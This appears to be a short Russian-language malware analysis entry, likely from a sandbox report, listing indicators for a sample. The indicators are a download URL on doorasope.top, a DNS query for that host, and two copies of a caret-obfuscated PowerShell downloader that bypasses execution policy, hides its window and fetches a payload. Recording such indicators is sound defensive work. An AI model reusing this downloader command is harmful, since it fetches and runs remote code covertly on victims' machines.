Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^wErsh^El^l.e^x^e^ -e^XECut^I^o^nPO^lIcY^ ^bYPAsS -n^o^p^R^o^fI^LE -w^inDow^ST^YlE H^IDDe^N ^(^nEw^-^oB^Je^CT^ S^y^STEM^.Ne^T.^W^EBclie^N^T)^.downloAD^fIL^e('http://www.doorasope.t...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "Po^wErsh^El^l.e^x^e^ -e^XECut^I^o^nPO^lIcY^ ^bYPAsS -n^o^p^R^o^fI^LE -w^inDow^ST^YlE H^IDDe^N ^(^nEw^-^oB^Je^CT^ S^y^STEM^.Ne^T.^W^EBclie^N^T)^.downloAD^fIL^e('http://www.doorasope.t...' (со скрытым окном)